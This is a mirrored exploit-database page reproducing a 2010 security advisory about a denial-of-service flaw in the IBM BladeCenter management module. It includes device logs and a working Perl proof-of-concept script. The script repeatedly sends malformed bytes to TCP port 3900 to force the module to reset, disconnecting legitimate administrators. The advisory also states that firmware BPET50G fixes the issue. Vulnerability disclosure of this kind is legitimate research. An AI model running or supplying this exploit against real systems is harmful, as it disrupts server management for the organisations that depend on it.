IBM Bladecenter Management Module – Denial of Service

  • 作者: Alexey Sintsov
    日期: 2010-04-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12252/
  • [DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability
    Source: http://www.dsecrg.com/pages/vul/show.php?id=149
    
    This device can be remotely rebooted by sending a malformed TCP packets
    
    
    Digital Security Research Group [DSecRG] Advisory #DSECRG-09-049
    
    
    Application: IBM BladeCenter Managmet Module
    Versions Affected: before BPET50G
    Vendor URL: http://www-03.ibm.com/systems/bladecenter/
    Bug: DoS
    Exploits: YES
    Reported: 24.07.2009
    Vendor response: 26.07.2009
    Date of Public Advisory: 15.04.2010
    Solution: YES
    Author: Alexey Sintsov
    of Digital Security Research Group [DSecRG]
    
    
    Description
    ***********
    
    The BladeCenter management module is a hot-swappable hardware device plugged into the BladeCenter
    chassis management bay. The management module functions as a system-management processor (service processor)
    and keyboard, video, and mouse (KVM) multiplexor for blade servers. This device can be remotely rebooted.
    
    Details
    *******
    
    Attacker can reset management module by sending about five or ten malformed packets on remote presence port (3900/tcp). All legal
    users, who use management module and management network will be disconnected.
    
    
    Network log:
    
    Jul 6 16:16:48 212.X.X.X NOTICE mgmt: Port MGT1 DISABLED and MGT2 ENABLED because Management Module 2 is active
    Jul 6 16:16:49 212.X.X.X ALERT system: link down on port MGT1
    Jul 6 16:16:51 212.X.X.X NOTICE system: link up on port MGT2
    Jul 6 16:17:18 212.X.X.X NOTICE mgmt: Management via all ports is DISABLED thru I2C Control Register
    Jul 6 16:17:20 212.X.X.X NOTICE mgmt: New Management IP Address 192.168.Y.Z configured
    Jul 6 16:17:23 212.X.X.X NOTICE mgmt: Management via all ports is ENABLED thru I2C Control Register
    
    BladeCenter log:
    
    9 I SERVPROC 07/06/09, 16:17:19 (SN#YK31337BR11L) Management Module in bay 1 is standby.
    10 I SERVPROC 07/06/09, 16:16:54 (SN#YK31337BR11L) Management module network initialization complete
    11 I SERVPROC 07/06/09, 16:16:51 (SN#YK31337BR11L) ENET Hostname=BladeMM, IP=192.168.Y.Y, GW=0.0.0.0, Mask=255.255.255.0.
    12 I SERVPROC 07/06/09, 16:16:50 (SN#YK31337BR11L) Management Module in bay 2 is primary.
    13 E SERVPROC 07/06/09, 16:16:45 AMM reset due to watchdog timeout
    
    
    Proof of Concept:
    *******************
    
    #!/usr/bin/perl
    #
    # BladeCenter AMM DoS
    # by Alexey Sintsov
    # Digital Security Research Group
    #
    # [http://dsecrg.com]
    #
    
    use Socket;
    
    $target='192.168.50.61';
    
    for ($i=1;$i<=20;$i++)
    {
    socket(SERVER, AF_INET, SOCK_STREAM, getprotobyname('tcp'));
    $trash="\xf1"x17;
    $target_ = inet_aton($target);
    $paddr=sockaddr_in(3900,$target_);
    
    
    sleep(2);
    if (connect(SERVER, $paddr))
    {
    recv(SERVER,$buf,20,0);
    send(SERVER,$trash,1);
    close(SERVER);
    print "$i - fire!\n";
    }
    else
    {
    print "$i - refused!\n";
    }
    }
    print "\nDone\n";
    
    Solution
    ********
    
    The issue has been fixed in AMM firmware version bpet50g and later.
    
    Refernces
    *********
    
    http://dsecrg.com/pages/vul/show.php?id=149
    http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5083945&brandind=5000020
    
    About
    *****
    
    Digital Security is leading IT security company in Russia,
    providing information security consulting, audit and penetration
    testing services, risk analysis and ISMS-related services and
    certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.
    Digital Security Research Group focuses on web application and database
    security problems with vulnerability reports, advisories and whitepapers
    posted regularly on our website.
    
    
    Contact: research [at] dsecrg [dot] com
    http://www.dsecrg.com